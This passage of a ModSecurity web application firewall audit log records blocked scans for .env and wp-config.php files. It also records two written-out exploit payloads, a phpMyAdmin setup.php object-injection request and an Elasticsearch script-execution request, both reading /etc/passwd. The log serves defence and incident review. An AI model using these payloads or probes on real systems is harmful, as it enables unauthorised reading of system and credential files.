phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884570970221 667 (- - -) Stopwatch2: 1748884570970221 667; combined=282, p1=249, p2=0, p3=0, p4=0, p5=32, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e74db529-Z-- --62245462-A-- [03/Jun/2025:00:16:11 +0700] aD3cW0A6be0-boUGPH241AAAAM4 103.236.140.4 57800 103.236.140.4 8181 --62245462-B-- GET /apps/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --62245462-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62245462-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884571150952 840 (- - -) Stopwatch2: 1748884571150952 840; combined=362, p1=324, p2=0, p3=0, p4=0, p5=38, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62245462-Z-- --56d62e55-A-- [03/Jun/2025:00:16:11 +0700] aD3cW38VMK8tZef_-m8ODAAAAFg 103.236.140.4 57802 103.236.140.4 8181 --56d62e55-B-- GET /back/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --56d62e55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56d62e55-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884571331911 704 (- - -) Stopwatch2: 1748884571331911 704; combined=267, p1=234, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56d62e55-Z-- --b895370a-A-- [03/Jun/2025:00:16:11 +0700] aD3cW0A6be0-boUGPH241QAAAM0 103.236.140.4 57804 103.236.140.4 8181 --b895370a-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --b895370a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b895370a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884571512731 651 (- - -) Stopwatch2: 1748884571512731 651; combined=258, p1=224, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b895370a-Z-- --c65d8741-A-- [03/Jun/2025:00:16:11 +0700] aD3cW38VMK8tZef_-m8ODgAAAFc 103.236.140.4 57808 103.236.140.4 8181 --c65d8741-B-- GET /cp/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --c65d8741-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c65d8741-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884571693456 767 (- - -) Stopwatch2: 1748884571693456 767; combined=294, p1=257, p2=0, p3=0, p4=0, p5=36, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c65d8741-Z-- --6ec64a41-A-- [03/Jun/2025:00:16:11 +0700] aD3cW0A6be0-boUGPH241gAAAMk 103.236.140.4 57810 103.236.140.4 8181 --6ec64a41-B-- GET /development/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --6ec64a41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ec64a41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884571874329 770 (- - -) Stopwatch2: 1748884571874329 770; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ec64a41-Z-- --94e69e77-A-- [03/Jun/2025:00:16:12 +0700] aD3cXEA6be0-boUGPH241wAAAMo 103.236.140.4 57812 103.236.140.4 8181 --94e69e77-B-- GET /docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --94e69e77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94e69e77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884572055162 732 (- - -) Stopwatch2: 1748884572055162 732; combined=342, p1=311, p2=0, p3=0, p4=0, p5=31, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94e69e77-Z-- --aaa6d71c-A-- [03/Jun/2025:00:16:12 +0700] aD3cXO6eDjh4wF4csdutMQAAAJM 103.236.140.4 57814 103.236.140.4 8181 --aaa6d71c-B-- GET /fedex/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --aaa6d71c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aaa6d71c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884572236116 680 (- - -) Stopwatch2: 1748884572236116 680; combined=280, p1=247, p2=0, p3=0, p4=0, p5=33, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aaa6d71c-Z-- --bced620a-A-- [03/Jun/2025:00:16:12 +0700] aD3cXEA6be0-boUGPH242AAAANg 103.236.140.4 57816 103.236.140.4 8181 --bced620a-B-- GET /local/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --bced620a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bced620a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884572416890 714 (- - -) Stopwatch2: 1748884572416890 714; combined=296, p1=264, p2=0, p3=0, p4=0, p5=32, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bced620a-Z-- --2b0a0b67-A-- [03/Jun/2025:00:16:12 +0700] aD3cXH8VMK8tZef_-m8ODwAAAEI 103.236.140.4 57818 103.236.140.4 8181 --2b0a0b67-B-- GET /private/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --2b0a0b67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b0a0b67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884572597882 690 (- - -) Stopwatch2: 1748884572597882 690; combined=267, p1=228, p2=0, p3=0, p4=0, p5=38, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b0a0b67-Z-- --620f0544-A-- [03/Jun/2025:00:16:12 +0700] aD3cXH8VMK8tZef_-m8OEAAAAEE 103.236.140.4 57820 103.236.140.4 8181 --620f0544-B-- GET /rest/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --620f0544-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --620f0544-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884572778780 677 (- - -) Stopwatch2: 1748884572778780 677; combined=255, p1=222, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --620f0544-Z-- --c6c14a6c-A-- [03/Jun/2025:00:16:12 +0700] aD3cXH8VMK8tZef_-m8OEQAAAFU 103.236.140.4 57822 103.236.140.4 8181 --c6c14a6c-B-- GET /shared/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --c6c14a6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6c14a6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884572959572 643 (- - -) Stopwatch2: 1748884572959572 643; combined=255, p1=223, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6c14a6c-Z-- --a23c0c69-A-- [03/Jun/2025:00:16:13 +0700] aD3cXUA6be0-boUGPH242QAAANE 103.236.140.4 57824 103.236.140.4 8181 --a23c0c69-B-- GET /sources/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --a23c0c69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a23c0c69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884573140439 644 (- - -) Stopwatch2: 1748884573140439 644; combined=257, p1=223, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a23c0c69-Z-- --4033a470-A-- [03/Jun/2025:00:16:13 +0700] aD3cXX8VMK8tZef_-m8OEgAAAFY 103.236.140.4 57826 103.236.140.4 8181 --4033a470-B-- GET /system/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --4033a470-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4033a470-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884573321326 857 (- - -) Stopwatch2: 1748884573321326 857; combined=328, p1=286, p2=0, p3=0, p4=0, p5=41, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4033a470-Z-- --fbb13e49-A-- [03/Jun/2025:00:16:13 +0700] aD3cXe6eDjh4wF4csdutMgAAAIc 103.236.140.4 57828 103.236.140.4 8181 --fbb13e49-B-- GET /wp-config.php~ HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --fbb13e49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbb13e49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884573502394 714 (- - -) Stopwatch2: 1748884573502394 714; combined=290, p1=256, p2=0, p3=0, p4=0, p5=34, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbb13e49-Z-- --b5f6bc7c-A-- [03/Jun/2025:00:16:13 +0700] aD3cXe6eDjh4wF4csdutNAAAAII 103.236.140.4 57834 103.236.140.4 8181 --b5f6bc7c-B-- GET /wp-config.inc HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --b5f6bc7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5f6bc7c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748884573683301 2613 (- - -) Stopwatch2: 1748884573683301 2613; combined=1004, p1=417, p2=556, p3=0, p4=0, p5=31, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5f6bc7c-Z-- --cc6f292d-A-- [03/Jun/2025:00:35:18 +0700] aD3g1u6eDjh4wF4csdutdQAAAIE 103.236.140.4 58614 103.236.140.4 8181 --cc6f292d-B-- POST /scripts/setup.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 80 User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 167390125 --cc6f292d-C-- action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} --cc6f292d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc6f292d-E-- --cc6f292d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/setup.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748885718687487 2015 (- - -) Stopwatch2: 1748885718687487 2015; combined=731, p1=336, p2=364, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc6f292d-Z-- --c3d9682d-A-- [03/Jun/2025:00:35:18 +0700] aD3g1u6eDjh4wF4csdutcwAAAJg 103.236.140.4 58610 103.236.140.4 8181 --c3d9682d-B-- POST /_search?pretty HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 369 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171242296 --c3d9682d-C-- { "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();" } } } --c3d9682d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3d9682d-E-- --c3d9682d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
